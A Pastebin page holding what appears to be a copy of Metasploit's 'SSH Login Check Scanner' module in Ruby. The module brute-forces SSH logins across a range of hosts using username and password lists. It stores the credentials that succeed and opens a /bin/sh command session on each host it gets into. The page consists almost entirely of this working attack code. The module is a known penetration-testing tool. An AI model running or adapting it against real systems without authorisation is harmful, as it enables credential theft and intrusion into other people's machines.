API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 10th, 2018
107
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.96 KB | None | 0 0
raw download clone embed print report
  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. require 'net/ssh'
  7. require 'net/ssh/command_stream'
  8. require 'metasploit/framework/login_scanner/ssh'
  9. require 'metasploit/framework/credential_collection'
  10.  
  11. class MetasploitModule < Msf::Auxiliary
  12. include Msf::Auxiliary::AuthBrute
  13. include Msf::Auxiliary::Report
  14. include Msf::Auxiliary::CommandShell
  15.  
  16. include Msf::Auxiliary::Scanner
  17.  
  18. def initialize
  19. super(
  20. 'Name' => 'SSH Login Check Scanner',
  21. 'Description' => %q{
  22. This module will test ssh logins on a range of machines and
  23. report successful logins. If you have loaded a database plugin
  24. and connected to a database this module will record successful
  25. logins and hosts so you can track your access.
  26. },
  27. 'Author' => ['todb'],
  28. 'References' =>
  29. [
  30. [ 'CVE', '1999-0502'] # Weak password
  31. ],
  32. 'License' => MSF_LICENSE,
  33. 'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors
  34. )
  35.  
  36. register_options(
  37. [
  38. Opt::RPORT(22)
  39. ], self.class
  40. )
  41.  
  42. register_advanced_options(
  43. [
  44. Opt::Proxies,
  45. OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
  46. OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
  47. ]
  48. )
  49.  
  50. end
  51.  
  52. def rport
  53. datastore['RPORT']
  54. end
  55.  
  56. def session_setup(result, ssh_socket)
  57. return unless ssh_socket
  58.  
  59. # Create a new session
  60. conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
  61.  
  62. merge_me = {
  63. 'USERPASS_FILE' => nil,
  64. 'USER_FILE' => nil,
  65. 'PASS_FILE' => nil,
  66. 'USERNAME' => result.credential.public,
  67. 'PASSWORD' => result.credential.private
  68. }
  69. info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
  70. s = start_session(self, info, merge_me, false, conn.lsock)
  71. self.sockets.delete(ssh_socket.transport.socket)
  72.  
  73. # Set the session platform
  74. case result.proof
  75. when /Linux/
  76. s.platform = "linux"
  77. when /Darwin/
  78. s.platform = "osx"
  79. when /SunOS/
  80. s.platform = "solaris"
  81. when /BSD/
  82. s.platform = "bsd"
  83. when /HP-UX/
  84. s.platform = "hpux"
  85. when /AIX/
  86. s.platform = "aix"
  87. when /Win32|Windows/
  88. s.platform = "windows"
  89. when /Unknown command or computer name/
  90. s.platform = "cisco-ios"
  91. end
  92.  
  93. s
  94. end
  95.  
  96.  
  97. def run_host(ip)
  98. @ip = ip
  99.  
  100. cred_collection = Metasploit::Framework::CredentialCollection.new(
  101. blank_passwords: datastore['BLANK_PASSWORDS'],
  102. pass_file: datastore['PASS_FILE'],
  103. password: datastore['PASSWORD'],
  104. user_file: datastore['USER_FILE'],
  105. userpass_file: datastore['USERPASS_FILE'],
  106. username: datastore['USERNAME'],
  107. user_as_pass: datastore['USER_AS_PASS'],
  108. )
  109.  
  110. cred_collection = prepend_db_passwords(cred_collection)
  111.  
  112. scanner = Metasploit::Framework::LoginScanner::SSH.new(
  113. host: ip,
  114. port: rport,
  115. cred_details: cred_collection,
  116. proxies: datastore['Proxies'],
  117. stop_on_success: datastore['STOP_ON_SUCCESS'],
  118. bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
  119. connection_timeout: datastore['SSH_TIMEOUT'],
  120. framework: framework,
  121. framework_module: self,
  122. )
  123.  
  124. scanner.verbosity = :debug if datastore['SSH_DEBUG']
  125.  
  126. scanner.scan! do |result|
  127. credential_data = result.to_h
  128. credential_data.merge!(
  129. module_fullname: self.fullname,
  130. workspace_id: myworkspace_id
  131. )
  132. case result.status
  133. when Metasploit::Model::Login::Status::SUCCESSFUL
  134. print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
  135. credential_data[:private_type] = :password
  136. credential_core = create_credential(credential_data)
  137. credential_data[:core] = credential_core
  138. create_credential_login(credential_data)
  139. session_setup(result, scanner.ssh_socket)
  140. :next_user
  141. when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
  142. vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
  143. scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
  144. invalidate_login(credential_data)
  145. :abort
  146. when Metasploit::Model::Login::Status::INCORRECT
  147. vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
  148. invalidate_login(credential_data)
  149. scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
  150. else
  151. invalidate_login(credential_data)
  152. scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
  153. end
  154. end
  155. end
  156. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!